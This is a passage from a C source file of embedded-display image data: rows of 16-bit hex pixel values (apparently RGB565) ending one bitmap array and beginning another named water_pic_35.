0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ce, 0xd123, 0xd185, 0xd185, 0xd123, 0xf5d7, 0xe38d, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd164, 0xda48, 0xed54, 0xecb2, 0xffff, 0xffdf, 0xecd2, 0xecd3, 0xf6db, 0xffff, 0xffff, 0xffff, 0xec91, 0xda07, 0xff9e, 0xffff, 0xffbe, 0xd9e7, 0xf6db, 0xf5b6, 0xd103, 0xd185, 0xd165, 0xd103, 0xf658, 0xdaeb, 0xd103, 0xd164, 0xd164, 0xd164, 0xd164, 0xd164, 0xd165, 0xd185, 0xd185, 0xd164, 0xda07, 0xff1c, 0xe3ae, 0xd103, 0xd103, 0xd144, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xe430, 0xed13, 0xd081, 0xd123, 0xd123, 0xd123, 0xd123, 0xd0c2, 0xdaaa, 0xff1c, 0xda07, 0xd164, 0xd165, 0xda07, 0xf69a, 0xd185, 0xd103, 0xd123, 0xd123, 0xd123, 0xd0c2, 0xe36d, 0xfefb, 0xd185, 0xd165, 0xd185, 0xd103, 0xdaeb, 0xf658, 0xd103, 0xd164, 0xd164, 0xd164, 0xd164, 0xd164, 0xd164, 0xd185, 0xd185, 0xd185, 0xd123, 0xe450, 0xf6da, 0xda07, 0xd0e3, 0xd103, 0xd144, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xecf3, 0xf679, 0xd9c6, 0xd0e3, 0xd123, 0xd144, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd185, 0xd165, 0xd0a1, 0xf5b6, 0xe34c, 0xd0c2, 0xd123, 0xd123, 0xd123, 0xd123, 0xd123, 0xd144, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd144, 0xdaaa, 0xed34, 0xecb2, 0xffff, 0xffdf, 0xecb2, 0xe32c, 0xda07, 0xe36d, 0xff9d, 0xffff, 0xffff, 0xe3ae, 0xe36c, 0xffff, 0xffff, 0xecd2, 0xe3ae, 0xf679, 0xd103, 0xd185, 0xd9c6, 0xda68, 0xf6ba, 0xdaa9, 0xda07, 0xda28, 0xda28, 0xda28, 0xda28, 0xda28, 0xda07, 0xd185, 0xd185, 0xd185, 0xd124, 0xdaaa, 0xf69a, 0xf638, 0xec71, 0xe30b, 0xda27, 0xd164, 0xd103, 0xd144, 0xd185, 0xd185, 0xd185, 0xd103, 0xe40f, 0xf618, 0xe34c, 0xe3ae, 0xe3ae, 0xe3ae, 0xe38d, 0xecb2, 0xff3c, 0xe38d, 0xd123, 0xd185, 0xd165, 0xd9e7, 0xf6db, 0xe3ee, 0xe38d, 0xe3ad, 0xe38d, 0xe34c, 0xec71, 0xf6fb, 0xe30b, 0xd124, 0xd185, 0xd1a5, 0xd9a6, 0xec71, 0xf5b6, 0xd9a5, 0xda28, 0xda28, 0xda28, 0xda28, 0xda28, 0xda28, 0xd9c6, 0xd185, 0xd185, 0xd185, 0xd124, 0xec91, 0xf6db, 0xed95, 0xe3ef, 0xdaaa, 0xd9e6, 0xd124, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xecf3, 0xf6da, 0xed54, 0xe3ce, 0xdaa9, 0xd9c6, 0xd123, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd164, 0xda27, 0xe34c, 0xf699, 0xecf3, 0xe36d, 0xe3ae, 0xe3ae, 0xe3ae, 0xe3ae, 0xe3ae, 0xdaea, 0xd164, 0xd185, 0xd185,
0xd185, 0xd185, 0xd164, 0xda69, 0xed95, 0xda89, 0xffff, 0xffff, 0xffff, 0xffff, 0xff7d, 0xe38d, 0xda28, 0xff7d, 0xffff, 0xffbe, 0xda07, 0xf659, 0xffff, 0xff9e, 0xda48, 0xdaca, 0xd164, 0xd144, 0xed34, 0xfefb, 0xffbe, 0xf6da, 0xf6da, 0xf6db, 0xf6db, 0xf6db, 0xf6db, 0xf6db, 0xf5d6, 0xd185, 0xd185, 0xd185, 0xd185, 0xd124, 0xd164, 0xe36d, 0xed34, 0xf638, 0xf679, 0xf659, 0xed34, 0xda27, 0xd123, 0xd185, 0xd185, 0xd103, 0xe3ef, 0xfefb, 0xed95, 0xf5b6, 0xf5b6, 0xf5b6, 0xf5b6, 0xed34, 0xda69, 0xd103, 0xd185, 0xd185, 0xd165, 0xd9e6, 0xff1c, 0xf617, 0xf5f7, 0xf5f7, 0xf5f7, 0xff1b, 0xffff, 0xe38d, 0xd0a2, 0xd1a5, 0xd144, 0xda68, 0xf69a, 0xff7d, 0xff7d, 0xf6ba, 0xf6db, 0xf6db, 0xf6db, 0xf6db, 0xf6db, 0xf6db, 0xe3ce, 0xd123, 0xd185, 0xd185, 0xd185, 0xd103, 0xda07, 0xe430, 0xf5b6, 0xf659, 0xf679, 0xf638, 0xe430, 0xd144, 0xd164, 0xd185, 0xd185, 0xd165, 0xd103, 0xda48, 0xec50, 0xf5b6, 0xf659, 0xf679, 0xf617, 0xe3ce, 0xd124, 0xd165, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd144, 0xdaca, 0xf5b6, 0xff5c, 0xf699, 0xf5b6, 0xf5d7, 0xf5d7, 0xf5d7, 0xf5d7, 0xf5d7, 0xec50, 0xd144, 0xd185, 0xd185,
0xd185, 0xd185, 0xd165, 0xd9c6, 0xf617, 0xd165, 0xe36d, 0xff1b, 0xffff, 0xffff, 0xffff, 0xffff, 0xe3ee, 0xe32c, 0xffff, 0xffff, 0xecb2, 0xe36d, 0xffff, 0xffff, 0xe38d, 0xd0c2, 0xd185, 0xd185, 0xd9a6, 0xda27, 0xf69a, 0xda69, 0xd9c6, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9c6, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd124, 0xd103, 0xd144, 0xd9c6, 0xdaa9, 0xecd2, 0xff3c, 0xdaaa, 0xd144, 0xd185, 0xd103, 0xe450, 0xecf3, 0xd081, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd144, 0xd185, 0xd185, 0xd185, 0xd165, 0xda07, 0xf699, 0xd185, 0xd0e3, 0xd123, 0xd103, 0xd144, 0xe38d, 0xff3c, 0xdaaa, 0xd144, 0xd185, 0xd185, 0xd185, 0xec50, 0xf5b6, 0xd164, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9a6, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd103, 0xd103, 0xd164, 0xda07, 0xe32c, 0xf638, 0xf5f7, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd103, 0xd103, 0xd165, 0xda07, 0xe36d, 0xf699, 0xed75, 0xd144, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd185, 0xd164, 0xd0a1, 0xf5b6, 0xe34c, 0xd0a2, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd144, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe34c, 0xd0c2, 0xd144, 0xd9c6, 0xe3ce, 0xff9e, 0xffff, 0xffdf, 0xda28, 0xf679, 0xffff, 0xfefb, 0xda68, 0xffbe, 0xffff, 0xed54, 0xd103, 0xd185, 0xd185, 0xd165, 0xd103, 0xf638, 0xe30b, 0xd103, 0xd165, 0xd165, 0xd165, 0xd165, 0xd165, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd144, 0xd0a2, 0xe40f, 0xf638, 0xd123, 0xd185, 0xd103, 0xe430, 0xed34, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xda07, 0xf69a, 0xd9e7, 0xd165, 0xd185, 0xd185, 0xd185, 0xd0a2, 0xe430, 0xf638, 0xd123, 0xd185, 0xd185, 0xd123, 0xdaea, 0xf659, 0xd103, 0xd164, 0xd165, 0xd165, 0xd165, 0xd165, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd123, 0xd0e3, 0xf679, 0xe3ef, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd103, 0xd124, 0xf6da, 0xe34c, 0xd124, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd185, 0xd185, 0xd123, 0xf5d6, 0xe38d, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd123, 0xe3ad, 0xf5b6, 0xd0a2, 0xe34c, 0xec91, 0xd164, 0xe34c, 0xffff, 0xffff, 0xe450, 0xe430, 0xffff, 0xffdf, 0xda89, 0xf6fb, 0xffff, 0xed75, 0xd103, 0xd185, 0xd185, 0xd185, 0xd103, 0xecb2, 0xf5b6, 0xd0c2, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xda07, 0xf69a, 0xd1a5, 0xd185, 0xd103, 0xe430, 0xed34, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xda07, 0xf69a, 0xd9e7, 0xd165, 0xd185, 0xd185, 0xd185, 0xd165, 0xd9c6, 0xf6ba, 0xda07, 0xd164, 0xd185, 0xd185, 0xd165, 0xf6ba, 0xdaea, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd0e2, 0xec91, 0xed34, 0xd103, 0xd185, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd0c2, 0xed34, 0xec91, 0xd103, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd185, 0xd185, 0xd123, 0xf5d6, 0xe38d, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xf617, 0xe3ce, 0xff7d, 0xffff, 0xf5f7, 0xd103, 0xff3c, 0xffff, 0xed55, 0xe36d, 0xffff, 0xffff, 0xdaea, 0xf638, 0xff1c, 0xd9e7, 0xd164, 0xd185, 0xd185, 0xd185, 0xd165, 0xd9a6, 0xff1c, 0xe32c, 0xd0e2, 0xd185, 0xd185, 0xd185, 0xd165, 0xd103, 0xd165, 0xd185, 0xd165, 0xda07, 0xd9e7, 0xd103, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd0c2, 0xe3ce, 0xf658, 0xd124, 0xd185, 0xd103, 0xe430, 0xed34, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xda07, 0xf69a, 0xd9e7, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xf679, 0xda89, 0xd164, 0xd185, 0xd185, 0xd103, 0xe3ef, 0xf6da, 0xd124, 0xd144, 0xd185, 0xd185, 0xd185, 0xd144, 0xd123, 0xd185, 0xd185, 0xd185, 0xda48, 0xd144, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd0c2, 0xf638, 0xe40f, 0xd123, 0xd185, 0xda48, 0xd144, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xf69a, 0xe34c, 0xd124, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd185, 0xd185, 0xd123, 0xf5d7, 0xe38d, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xda69, 0xff1c, 0xffbe, 0xffff, 0xecf3, 0xd185, 0xff7d, 0xffff, 0xed34, 0xe36c, 0xffff, 0xffff, 0xe30b, 0xd144, 0xd9e6, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xe30b, 0xff7d, 0xe3ae, 0xd124, 0xd103, 0xd0e3, 0xd185, 0xecd2, 0xda48, 0xd164, 0xd124, 0xe30b, 0xfefb, 0xe40f, 0xd9c6, 0xd103, 0xd103, 0xd103, 0xd123, 0xe34c, 0xff7d, 0xdaea, 0xd144, 0xd185, 0xd103, 0xe430, 0xed34, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd9c6, 0xf6ba, 0xda07, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd1a5, 0xf69a, 0xda07, 0xd144, 0xd185, 0xd185, 0xd185, 0xd103, 0xed75, 0xf679, 0xda27, 0xd103, 0xd103, 0xd0e3, 0xe30b, 0xec50, 0xd144, 0xd185, 0xd124, 0xed54, 0xf638, 0xdaca, 0xd144, 0xd103, 0xd103, 0xd103, 0xd185, 0xed54, 0xf679, 0xd164, 0xd165, 0xd144, 0xf5d7, 0xf5d7, 0xda89, 0xd144, 0xd103, 0xd103, 0xd103, 0xd9a5, 0xf5d7, 0xf5f7, 0xd124, 0xd185, 0xd185, 0xd103, 0xf5d6, 0xe3ae, 0xd123, 0xd185, 0xd185, 0xd123, 0xf5f7, 0xe38d, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xe32c, 0xff7d, 0xec91, 0xd061, 0xe3ae, 0xffff, 0xffff, 0xe3ad, 0xecd2, 0xffff, 0xffff, 0xd9a5, 0xda48, 0xf638, 0xda69, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xdaca, 0xf679, 0xf659, 0xed75, 0xed75, 0xf69a, 0xf596, 0xd1a5, 0xd165, 0xd185, 0xd144, 0xdaca, 0xf5d6, 0xf69a, 0xf5f7, 0xed75, 0xed95, 0xf638, 0xf69a, 0xe30b, 0xd103, 0xd185, 0xd185, 0xd103, 0xec51, 0xed55, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xe40f, 0xfefb, 0xd185, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xf658, 0xf638, 0xda07, 0xd164, 0xd185, 0xd185, 0xd165, 0xd123, 0xec91, 0xf6ba, 0xf5f7, 0xed34, 0xf5d6, 0xf6fb, 0xe3ae, 0xd144, 0xd185, 0xd165, 0xd185, 0xe430, 0xf679, 0xf659, 0xf5b6, 0xed55, 0xf5b6, 0xf69a, 0xf5b6, 0xd9a5, 0xd144, 0xd185, 0xd165, 0xd1a5, 0xec91, 0xf699, 0xf658, 0xf596, 0xed55, 0xf5d6, 0xf6ba, 0xed54, 0xd164, 0xd164, 0xd185, 0xd185, 0xd103, 0xf5f7, 0xe3ae, 0xd123, 0xd185, 0xd185, 0xd103, 0xf638, 0xe3ae, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xdaa9, 0xf618, 0xecf3, 0xdaeb, 0xecf3, 0xf5d6, 0xd144, 0xda48, 0xec91, 0xe450, 0xecd2, 0xf699, 0xe32c, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd124, 0xd144, 0xdaeb, 0xe40f, 0xe40f, 0xdaaa, 0xd123, 0xd165, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xda28, 0xe36d, 0xe40f, 0xe3ef, 0xe30b, 0xd165, 0xd123, 0xd185, 0xd185, 0xd185, 0xd165, 0xda48, 0xda89, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xe32b, 0xdaaa, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xda48, 0xe40f, 0xd9c6, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xd9e6, 0xe38d, 0xe430, 0xe3ae, 0xd9e6, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xd165, 0xdaca, 0xe3ef, 0xe430, 0xe3ce, 0xda69, 0xd123, 0xd164, 0xd185, 0xd185, 0xd185, 0xd165, 0xd103, 0xd185, 0xe2eb, 0xe3ef, 0xe430, 0xe3ae, 0xda48, 0xd103, 0xd165, 0xd185, 0xd185, 0xd185, 0xd164, 0xdaa9, 0xda07, 0xd165, 0xd185, 0xd185, 0xd164, 0xdaeb, 0xda28, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xd185, 0xe430, 0xf5d6, 0xed55, 0xecf3, 0xecf3, 0xecf3, 0xed34, 0xed95, 0xec71, 0xd9a5, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xd103, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd124, 0xd103, 0xd123, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd124, 0xd103, 0xd123, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd123, 0xd103, 0xd123, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd123, 0xd103, 0xd123, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd103, 0xd164, 0xda69, 0xe34c, 0xe3ae, 0xe36d, 0xda89, 0xd165, 0xd103, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd124, 0xd123, 0xd124, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185
};
const uint16_t water_pic_35[] = {
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0x18c3, 0x39e7, 0x7bef, 0x8c71, 0x9492, 0x9492, 0x8c71, 0x7bcf, 0x528a, 0x10a2, 0x0861, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0x5acb, 0xa534, 0xe71c, 0xffff, 0xffdf, 0xdefb, 0xce79, 0xce59, 0xd6ba, 0xf79e, 0xffff, 0xe73c, 0xb596, 0x52aa, 0x10a2, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x528a, 0xb5b6, 0xffff, 0xef5d, 0x9492, 0x8430, 0x4208, 0x2104, 0x0861, 0x0841, 0x18c3, 0x39c7, 0x6b6d, 0x8c51, 0xce79, 0xffff, 0xc638, 0x5acb, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xa534, 0xffdf, 0xf79e, 0x8410, 0x2965, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18e3, 0x630c, 0xce59, 0xffff, 0xa514, 0x18c3, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0xce59, 0xffff, 0xad55, 0x2124, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0x73ae, 0xffff, 0xef7d, 0x10a2, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0xd69a, 0xffff, 0x5acb, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2124, 0xffff, 0xf79e, 0x10a2, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0861, 0xd6ba, 0xffff, 0x31a6, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xef7d, 0x10a2, 0x0000, 0x0000, 0x0000, 0x0000,
